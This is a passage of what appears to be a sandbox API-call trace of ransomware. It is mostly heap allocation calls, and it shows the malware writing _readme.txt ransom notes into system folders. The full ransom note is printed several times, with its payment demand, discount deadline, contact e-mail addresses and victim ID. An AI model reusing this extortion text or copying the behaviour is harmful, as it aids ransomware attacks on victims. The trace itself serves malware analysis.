hHeap=0x4970000) returned 1 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.043] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.043] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.043] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.043] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.043] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.043] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.043] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.043] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.043] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.043] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.043] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.043] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.043] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.043] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.043] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.043] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0128.044] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0128.044] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.044] PathFindFileNameW (pszPath="") returned="" [0128.044] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0128.044] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0128.044] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0128.045] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0128.045] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0128.046] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.046] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe38b88c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38b88c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.046] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0128.047] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38b88c0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe38b88c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38b88c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0128.047] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38b88c0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe38b88c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38b88c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0128.047] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0128.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0128.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0128.047] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0128.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.048] RtlAllocateHeap (HeapHandle=0x4970000, 